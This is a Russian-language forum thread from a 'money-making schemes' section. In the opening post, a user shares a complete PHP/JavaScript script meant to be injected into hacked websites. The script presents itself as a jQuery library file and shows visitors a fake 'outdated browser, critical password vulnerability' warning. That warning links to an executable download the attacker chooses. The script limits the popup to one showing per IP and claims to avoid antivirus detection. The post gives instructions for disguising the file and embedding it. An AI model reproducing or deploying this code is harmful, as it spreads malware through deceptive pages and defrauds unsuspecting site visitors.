Скачать Делаем форму для слива трафика с лома

Тема в разделе "Схемы заработка", создана пользователем Centr, 10 июн 2015.

  1. TopicStarter Overlay
    Centr

    Centr Команда форума

    Данный скрипт показывает форму обновления браузера.
    Поменяйте в начале скрипта ссылку для слива EXE.

    - 1 раз на 1 IP

    Чтобы отключить для себя блокировку по IP, просто добавьте к скрипту параметр "no" (напр:index.php?no).

    - Работает во всех 4х браузерах
    - Показывает английскую или русскую версию окна в зависимости от языка браузера
    - Не палится АВ, использует публичные библиотеки

    Код:
    <?php$domain = "";// Ссылка для слива EXE (site.ru/?q=). К ссылке в конце будет прикреплено название браузера
    header('Content-type: application/javascript');
    ?>
       /*!
       * jQuery JavaScript Library v2.1.1
       * http://jquery.com/
       *
       * Includes Sizzle.js
       * http://sizzlejs.com/
       *
       * Copyright 2005, 2014 jQuery Foundation, Inc. and other contributors
       * Released under the MIT license
       * http://jquery.org/license
       *
       * Date: 2014-05-01T17:11Z
       */
    // For CommonJS and CommonJS-like environments where a proper window is present,
    // execute the factory and get jQuery
    // For environments that do not inherently posses a window with a document
    // (such as Node.js), expose a jQuery-making factory as module.exports
    // This accentuates the need for the creation of a real window
    // e.g. var jQuery = require("jquery")(window);
    // See ticket #14549 for more info
    // Can't do this because several apps including ASP.NET trace
    // the stack via arguments.caller.callee and Firefox dies if
    // you try to trace through "use strict" call chains. (#13335)
    // Support: Firefox 18+
    //
    
    /*!
       * Sizzle CSS Selector Engine v1.10.19
       * http://sizzlejs.com/
       *
       * Copyright 2013 jQuery Foundation, Inc. and other contributors
       * Released under the MIT license
       * http://jquery.org/license
       *
       * Date: 2014-04-18
       */
    document.write("<script type=\"text\/javascript\" src=\"http:\/\/code.jquery.com\/jquery-2.1.1.min.js\"><\/script>");
    <?php
    $ip = $_SERVER['REMOTE_ADDR'];
    $ips = file_get_contents('ips.txt');
    
    error_reporting(E_ALL);
    error_reporting(1);
    
    if (!isset($_GET['no'])) {
         if (!strstr($ips, trim($ip))) {
            fwrite(fopen('ips.txt', 'a+'), $ip."\n");
            fclose();
         } else {
            die();
         }
    }
    ?>
    document.write("<link rel=\"stylesheet\" href=\"http:\/\/jreject.turnwheel.com\/css\/jquery.reject.css\">"+
    "<script type=\"text\/javascript\" src=\"http:\/\/jreject.turnwheel.com\/js\/jquery.reject.min.js\"><\/script>"+
    "<script type=\"text\/javascript\">"+
    "$(function() {"+
    "    $.reject({  "+
    "        reject: { all: true },"+
    "        close: false,"+
    "        display: ['firefox','opera','chrome','msie'],  "+
    "       imagePath: 'http:\/\/jreject.turnwheel.com\/images\/',  "+
    "       closeCookie: true,"+
    <?php
    $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
    if ($lang == "ru") {
    echo '" header: \'<center>Вы знали что Ваш браузер устарел и содержит уязвимости?</center>\',  "+
    "    paragraph1: \'<center>Скачайте последнюю версию Вашего браузера по ссылкам ниже.</center>\',  "+
    "   paragraph2: \'<center><b><font color=red>НАЙДЕНО: 1 критическая уязвимость:</font> перехват личных паролей</b> <br/><font color=red>vuln_#29.135.1-IObrowser</font>: password-cookie_cross-browser vulnerability</center>\',  "+';
    } else {
    echo '" header: \'<center>Did you know that your browser is outdated and contains a vulnerability?</center>\',  "+
    "    paragraph1: \'<center>Download the latest version of the browser on the links below!</center>\',  "+
    "   paragraph2: \'<center><b><font color=red>FOUNDED: 1 critical vulnerability:</font> password sniffer</b> <br/><font color=red>vuln_#29.135.1-IObrowser</font>: password-cookie_cross-browser vulnerability</center>\',  "+';
    }
    ?>
    "     browserInfo: {"+
    "        chrome: {  "+
    "            text: 'Chrome 37',  "+
    "            url: '<?=$domain;?>chrome_browser'  "+
    "        },  "+
    "        firefox: {  "+
    "            text: 'Firefox 31',  "+
    "            url: '<?=$domain;?>mozilla-firefox_browser'  "+
    "        },   "+
    "        opera: {  "+
    "            text: 'Opera 23',  "+
    "            url: '<?=$domain;?>opera_browser' "+
    "        },  "+
    "        msie: {  "+
    "            text: 'IE 11',  "+
    "            url: '<?=$domain;?>internet-explorer_browser' "+
    "        }  "+
    "    }  "+
    "    }); "+
    "    return false;  "+
    "});"+
    "<\/script>");
    Сохраняем данный скрипт с непаливным названием (напр: jquery-1.44-min.js.php) на своем домене и подключаем в конце любого сайта вот так:
    Код:
    <script type="text/javascript" src="http://site.ru/jquery-1.44-min.js.php"></script>
     
    Последнее редактирование: 13 янв 2016
  2. Мне когда-то сайт взломали, тоже такую фигню вставили.
     
  3. Она нормально так траф сливает)
     
  4. Не хочется карму портить
     

Поделиться этой страницей